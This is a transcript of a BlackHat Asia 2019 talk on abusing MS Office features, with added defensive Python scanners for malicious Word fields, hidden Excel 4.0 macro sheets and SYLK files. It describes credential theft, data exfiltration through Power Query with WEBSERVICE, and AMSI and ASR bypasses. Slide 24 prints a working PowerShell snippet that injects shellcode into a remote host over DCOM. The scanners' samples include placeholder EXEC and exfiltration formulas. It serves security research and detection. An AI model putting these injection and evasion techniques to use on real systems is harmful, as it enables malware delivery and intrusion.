MS Office in Wonderland

2020-03-01, 467 views

  • 1. MS OFFICE IN WONDERLAND. Stan Hegt & Pieter Ceelen, BlackHat Asia, March 2019
  • 2. Pieter, Stan. Most MS Office malware focuses on well-known tricks such as DDE and VBA macros. But there is so much more functionality in Word and Excel that can be abused. We'll take you on a journey down the rabbit hole!
  • 3. WHO NEEDS CODE EXECUTION ANYWAY?
  • 4. ABOUT FIELDS www.outflank.nl 3
  • 5. INCLUDEPICTURE
  • 6. CREDENTIAL THEFT: CVE-2019-0540
  • 7. CVE-2019-0540 – CREDENTIAL THEFT. In the header of a DotX file, the INCLUDEPICTURE URL is made dynamic by adding the USERNAME field. Word does not continue loading as long as the picture is not loaded.
  • 8. ARBITRARY FILE READ: CVE-2019-0561
  • 9. CVE-2019-0561 – ARBITRARY FILE READING (1/2). A revisit of CVE-2002-1143: in 2002, an INCLUDETEXT field could read an arbitrary file. MS fix: the INCLUDETEXT field is not updated on various events and as such is no longer dynamic. Or is it still ...?
  • 10. CVE-2019-0561 – ARBITRARY FILE READING (2/2)
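Both field abuses above (an INCLUDEPICTURE whose URL is made per-user with a nested USERNAME field, and an INCLUDETEXT that pulls in a local file) leave a recognisable trace in the document's XML parts, so a mail gateway or triage script can flag them before Word ever renders the file. The scanner below is an added example for this page, not code from the talk or from Outflank: it walks the body, header and footer parts of an OOXML document with regular expressions (no full WordprocessingML parser), joins the split w:instrText runs of each paragraph back into one field instruction, and reports every external-include field together with its target and whether a USERNAME field makes it dynamic. The sample .dotx it builds in memory, the host example.invalid and the local path are all constructed for the demonstration.

```python
import html
import io
import re
import zipfile

# Field types that pull external content into a Word document, and the field
# that makes such a reference per-user (the nested-USERNAME pattern above).
EXTERNAL_FIELDS = ("INCLUDEPICTURE", "INCLUDETEXT")
DYNAMIC_FIELDS = ("USERNAME",)

INSTR_RE = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.S)
SIMPLE_RE = re.compile(r'<w:fldSimple\b[^>]*\bw:instr="([^"]*)"')
# http(s) URL, UNC path (\\server\share) or drive path (C:\...), as written in field codes
TARGET_RE = re.compile(r'(?:https?://|\\\\|[A-Za-z]:\\)[^\s"]*', re.I)
PART_RE = re.compile(r"^word/(document|header\d*|footer\d*)\.xml$")


def field_codes_per_paragraph(xml):
    """Yield the joined field instruction text of every w:p paragraph.

    A complex field splits one instruction over several w:instrText runs, and a
    nested field (USERNAME inside INCLUDEPICTURE) lives in the same paragraph,
    so joining per paragraph recovers the whole instruction."""
    for para in re.split(r"<w:p[ >]", xml)[1:]:
        parts = INSTR_RE.findall(para) + SIMPLE_RE.findall(para)
        if parts:
            yield html.unescape(" ".join(p.strip() for p in parts))


def scan_part(part_name, xml):
    findings = []
    for code in field_codes_per_paragraph(xml):
        upper = code.upper()
        for field in EXTERNAL_FIELDS:
            if field in upper:
                m = TARGET_RE.search(code)
                findings.append({
                    "part": part_name,
                    "field": field,
                    "target": m.group(0) if m else None,
                    "dynamic": any(d in upper for d in DYNAMIC_FIELDS),
                })
    return findings


def scan_document(data):
    """Scan a .docx/.dotx (OOXML zip, given as bytes) for external-include fields."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if PART_RE.match(name):
                findings.extend(scan_part(name, zf.read(name).decode("utf-8", "replace")))
    return findings


W_NS = 'xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'


def build_sample():
    """Constructed sample: a minimal .dotx whose header carries an INCLUDEPICTURE
    field with a nested USERNAME field, and whose body has a static INCLUDETEXT."""
    header = (
        f'<w:hdr {W_NS}><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE "http://example.invalid/pic.png?u=</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> USERNAME </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '<w:r><w:instrText xml:space="preserve">" \\d</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:hdr>'
    )
    body = (
        f'<w:document {W_NS}><w:body>'
        '<w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p>'
        '<w:p><w:fldSimple w:instr=" INCLUDETEXT &quot;C:\\\\Users\\\\Public\\\\sample.txt&quot; ">'
        '<w:r><w:t>(text)</w:t></w:r></w:fldSimple></w:p>'
        '</w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", body)
        zf.writestr("word/header1.xml", header)
    return buf.getvalue()


def main():
    for finding in scan_document(build_sample()):
        flag = "per-user (USERNAME)" if finding["dynamic"] else "static"
        print(f'{finding["part"]}: {finding["field"]} -> {finding["target"]} [{flag}]')


if __name__ == "__main__":
    main()
```

Any INCLUDEPICTURE or INCLUDETEXT pointing at an http(s) URL or a UNC path is worth a look on its own, because Word resolves it on open; the combination with a nested USERNAME field is the exact shape of the credential-theft slide and deserves an alert rather than a log line.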
  • 11. MITIGATION
  • 12. MEET M: GET & TRANSFORM ABUSE
  • 13. GIVE ME THE POWER! Fields are old school and patched... Now the same tricks with new school techniques.
  • 14. STEALING UNATTEND.XML. A GET & TRANSFORM query definition in M retrieves unattend.xml. Column A: retrieving data from the file (GET & TRANSFORM). Column B: posting the results (WEBSERVICE, max 2048 chars).
  • 15. WHAT ELSE CAN BE DONE? Ongoing research; there is a lot more to retrieve using this feature.
  • 16. WHO NEEDS VBA FOR MACROS ANYWAY?
  • 17. ENTERING THE MACRO RABBIT HOLE. VBA != Macros: there are at least two macro languages supported by MS Office • Visual Basic for Applications (VBA) • Excel 4.0 macros (XLM, only in Excel). VBA != VBA: for VBA there are 2 intermediary languages • P-code • Exe-codes
  • 18. HOW TO INSERT AN XLM MACRO
  • 19. EXCEL 4.0 MACRO KUNG FU https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/
  • 20. HIDING YOUR EXCEL 4.0 MACRO
  • 21. HIDING YOUR EXCEL 4.0 MACRO. Can be achieved with one line of VBA: ActiveSheet.Visible = xlSheetVeryHidden. Then remove the VBA code and save the Excel file.
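The two Excel tricks above leave artifacts in the workbook package that do not depend on any VBA being present: a Get & Transform query plus WEBSERVICE() exfiltration (slide 14) shows up as a DataMashup part and a WEBSERVICE formula, and a "very hidden" Excel 4.0 macro sheet (slide 21) shows up as a sheet entry with state="veryHidden" whose relationship target lives under xl/macrosheets/, usually paired with an _xlnm.Auto_Open defined name. The scanner below is an added example for this page, not code from the talk or from Outflank. It uses regular expressions over the package XML rather than a full SpreadsheetML parser, keys macro-sheet detection on the relationship target path (not on a relationship type URI), treats the presence of a DataMashup element as "a Power Query definition is embedded" without decoding it, and builds its sample .xlsm in memory from constructed parts (the host example.invalid and the EXEC argument are placeholders).

```python
import html
import io
import re
import zipfile

SHEET_RE = re.compile(r"<sheet\b([^>]*)/>")
REL_RE = re.compile(r"<Relationship\b([^>]*)/>")
ATTR_RE = re.compile(r'([\w:]+)="([^"]*)"')
FORMULA_RE = re.compile(r"<f\b[^>]*>(.*?)</f>", re.S)
AUTO_OPEN_RE = re.compile(r'<definedName\b[^>]*\bname="(_xlnm\.Auto_Open[^"]*)"')
# XLM functions that reach outside the workbook, plus the WEBSERVICE() worksheet
# function the slides use to post Power Query results out of the file.
SUSPICIOUS_FN = re.compile(r"\b(EXEC|CALL|REGISTER|WEBSERVICE)\s*\(", re.I)
SHEET_PART_RE = re.compile(r"^xl/(worksheets|macrosheets)/sheet\d+\.xml$")


def attrs(fragment):
    return dict(ATTR_RE.findall(fragment))


def scan_workbook(data):
    """Inspect an OOXML workbook (xlsx/xlsm bytes) for hidden XLM macro sheets,
    Auto_Open names, suspicious formulas and an embedded Power Query definition."""
    report = {"sheets": [], "auto_open": [], "formulas": [], "data_mashup": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()

        def read(name):
            return zf.read(name).decode("utf-8", "replace")

        rels = {}
        if "xl/_rels/workbook.xml.rels" in names:
            for rel in REL_RE.findall(read("xl/_rels/workbook.xml.rels")):
                a = attrs(rel)
                rels[a.get("Id")] = a.get("Target", "")
        workbook = read("xl/workbook.xml")
        for sheet in SHEET_RE.findall(workbook):
            a = attrs(sheet)
            target = rels.get(a.get("r:id"), "")
            report["sheets"].append({
                "name": a.get("name"),
                "state": a.get("state", "visible"),   # visible | hidden | veryHidden
                # Excel 4.0 macro sheets are stored under xl/macrosheets/, not xl/worksheets/
                "macro": "macrosheets/" in target,
            })
        report["auto_open"] = AUTO_OPEN_RE.findall(workbook)
        for name in names:
            if SHEET_PART_RE.match(name):
                for formula in FORMULA_RE.findall(read(name)):
                    m = SUSPICIOUS_FN.search(formula)
                    if m:
                        report["formulas"].append((name, m.group(1).upper(), html.unescape(formula)))
            elif name.startswith("customXml/") and "DataMashup" in read(name):
                report["data_mashup"] = True
    return report


def verdict(report):
    """Turn the raw report into a list of human-readable reasons to block or triage."""
    reasons = []
    for s in report["sheets"]:
        if s["macro"] and s["state"] != "visible":
            reasons.append(f"macro sheet '{s['name']}' is {s['state']}")
    if report["auto_open"]:
        reasons.append("Auto_Open defined name present")
    for part, fn, _ in report["formulas"]:
        reasons.append(f"{fn}() in {part}")
    if report["data_mashup"]:
        reasons.append("embedded Power Query (DataMashup) definition")
    return reasons


NS = 'xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"'
RNS = 'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"'


def build_sample():
    """Constructed .xlsm: a visible sheet with a WEBSERVICE() formula, a veryHidden
    Excel 4.0 macro sheet with an Auto_Open entry point, and a placeholder DataMashup part."""
    workbook = (
        f'<workbook {NS} {RNS}><sheets>'
        '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
        '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>'
        '</sheets><definedNames>'
        '<definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName>'
        '</definedNames></workbook>'
    )
    rels = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/>'
        '</Relationships>'
    )
    sheet1 = (
        f'<worksheet {NS}><sheetData><row r="1">'
        '<c r="A1"><f>SUM(B1:B2)</f><v>0</v></c>'
        '<c r="A2" t="str"><f>WEBSERVICE("http://example.invalid/collect?d="&amp;B1)</f><v></v></c>'
        '</row></sheetData></worksheet>'
    )
    macro1 = (
        f'<macrosheet {NS}><sheetData><row r="1">'
        '<c r="A1"><f>EXEC("placeholder.exe")</f><v>0</v></c>'
        '<c r="A2"><f>HALT()</f><v>0</v></c>'
        '</row></sheetData></macrosheet>'
    )
    mashup = ('<DataMashup xmlns="http://schemas.microsoft.com/DataMashup">'
              'UExBQ0VIT0xERVI=</DataMashup>')  # placeholder base64, not a real query
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/workbook.xml", workbook)
        zf.writestr("xl/_rels/workbook.xml.rels", rels)
        zf.writestr("xl/worksheets/sheet1.xml", sheet1)
        zf.writestr("xl/macrosheets/sheet1.xml", macro1)
        zf.writestr("customXml/item1.xml", mashup)
    return buf.getvalue()


if __name__ == "__main__":
    for reason in verdict(scan_workbook(build_sample())):
        print("-", reason)
```

The point of keying on the package structure is that it survives the VBA removal step from slide 21: once the VBA project is gone there is nothing for a VBA-only scanner to see, but the macro sheet, its veryHidden state and the Auto_Open name are still in xl/workbook.xml.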
  • 22. AV INDUSTRY FORGOT ABOUT 1992 TECHNOLOGY
  • 23. XLM VIA SYLK. XLM macros are also supported in SYLK files • Text-based file format which originates from the 80s • SYLK (.slk) files never open in the protected mode sandbox! • Turned out to be an RCE on MS Office 2011 for Mac (won't fix). Integrated into SharpShooter by MDSec: https://github.com/mdsecactivebreach/SharpShooter/blob/master/modules/excel4.py
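Because a .slk file is plain text and, as the slide notes, skips the Protected View sandbox, the sensible place to catch it is before delivery, and its record format is simple enough to triage with a few lines of parsing. The scanner below is an added example for this page, not code from the talk, from Outflank or from the SharpShooter module linked above. It splits the file into SYLK records (one per line, semicolon-separated fields, a literal semicolon escaped as ";;"), then flags three things: an O record carrying the E option that marks the sheet as a macro sheet, an NN (defined name) record naming an Auto_* entry point, and C (cell) records whose E field holds a formula calling EXEC, CALL, REGISTER or WEBSERVICE. The two .slk samples are constructed inline and the EXEC argument is a placeholder.

```python
import re

# XLM functions that reach outside the sheet; the same short list any XLM triage rule uses.
SUSPICIOUS_FN = re.compile(r"\b(EXEC|CALL|REGISTER|WEBSERVICE)\s*\(", re.I)


def parse_sylk(text):
    """Split a SYLK file into (record type, fields) tuples.

    Records are one per line and fields are ';'-separated; a literal ';' inside
    a field is written as ';;', which is restored here after splitting."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = [f.replace("\x00", ";") for f in line.replace(";;", "\x00").split(";")]
        records.append((fields[0], fields[1:]))
    return records


def scan_sylk(text):
    report = {"macro_sheet": False, "auto_names": [], "formulas": []}
    for rtype, fields in parse_sylk(text):
        if rtype == "O" and "E" in fields:          # O;E declares the sheet a macro sheet
            report["macro_sheet"] = True
        elif rtype == "NN":                         # defined name: NName;Ereference
            name = next((f[1:] for f in fields if f.startswith("N")), "")
            if name.lower().startswith("auto_"):    # Auto_Open / Auto_Close style entry points
                report["auto_names"].append(name)
        elif rtype == "C":                          # cell record; the E field carries a formula
            expr = next((f[1:] for f in fields if f.startswith("E")), "")
            if SUSPICIOUS_FN.search(expr):
                report["formulas"].append(expr)
    return report


def is_suspicious(report):
    return report["macro_sheet"] or bool(report["auto_names"]) or bool(report["formulas"])


# Constructed samples: a macro-bearing .slk and a plain data .slk
MACRO_SLK = "\n".join([
    "ID;PWXL;N;E",
    "O;E",
    "NN;NAuto_Open;ER1C1;KO",
    'C;X1;Y1;EEXEC("placeholder.exe")',
    "C;X1;Y2;EHALT()",
    "E",
])
DATA_SLK = "\n".join([
    "ID;PWXL;N;E",
    'C;X1;Y1;K"Revenue"',
    "C;X1;Y2;K100",
    "C;X1;Y3;ESUM(R[-2]C:R[-1]C)",
    "E",
])

if __name__ == "__main__":
    for label, sample in (("macro", MACRO_SLK), ("data", DATA_SLK)):
        report = scan_sylk(sample)
        print(label, "suspicious" if is_suspicious(report) else "clean", report)
```

A plain data export (the DATA_SLK case) has no O;E record, no Auto_* name and only arithmetic formulas, so it passes; anything that trips even one of the three checks is worth quarantining, since a legitimate .slk attachment with a macro sheet is rare enough to review by hand.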
  • 24. XLM EXPOSURE VIA (D)COM. Shellcode injection into a remote system with XLM via ExecuteExcel4Macro:

        $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "server01"));
        $memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",0,833,4096,64)');
        $ret = $excel.ExecuteExcel4Macro('CALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, ' + ($memaddr + 0) + ', ' + "CHAR`(252`)" + ', 1, 0)');
        ...
        $ret = $excel.ExecuteExcel4Macro('CALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, ' + ($memaddr + 832) + ', ' + "CHAR`(232`)" + ', 1, 0)');
        $excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)');

    PowerShell and Cobalt Strike implementations available at: https://github.com/outflanknl/Excel4-DCOM
  • 25. P-CODE
  • 26. INTRODUCING EVIL CLIPPY. It looks like your maldoc does not yet bypass AV. Do you want me to help? https://github.com/outflanknl/EvilClippy
  • 27. EVIL CLIPPY FEATURES. Current features: • Cross-platform (runs on OSX, Linux, Windows) • Hide macros from the GUI editor • Fool analyst tools by removing module names • VBA stomping (p-code abuse) • Serve payloads via HTTP templates. Available at https://github.com/outflanknl/EvilClippy
  • 28. HOW EFFECTIVE IS THIS? (BEFORE CLIPPY)
  • 29. HOW EFFECTIVE IS THIS? (AFTER CLIPPY)
  • 30. BYPASSING MODERN DEFENSES: AMSI & ASR
  • 31. VBA & ANTIMALWARE SCANNING INTERFACE. Specific triggers: any COM method or Win32 API call (Shell etc.). AMSI also catches p-code. MacroRuntimeScope: Disable, Low Trust documents, All documents.
  • 32. BYPASSING AMSI FOR MACROS. Techniques with example procedures:
      • Abuse non-VBA functionality: Fields & Power Query; Excel 4.0 macros
      • Execution outside of MacroRuntimeScope: drop malicious code into trusted locations
      • Non-trigger COM & Win32 API functions: Application.ExecuteExcel4Macro; CreateObject("Excel.Application") and calling DDEInitialize; WMI SpawnInstance
      • VBA functions that are not in AMSI logs (not COM & not Win32 API): Application.SendKeys; a macro creates a .bat and .reg in Startup by using Word SaveAs .txt, the reg key disables AMSI by altering MacroRuntimeScope
  • 33. ATTACK SURFACE REDUCTION RULES. Rules enforced by Windows Defender Exploit Guard. Block Win32 API calls from Office macro (static rule). Bypass: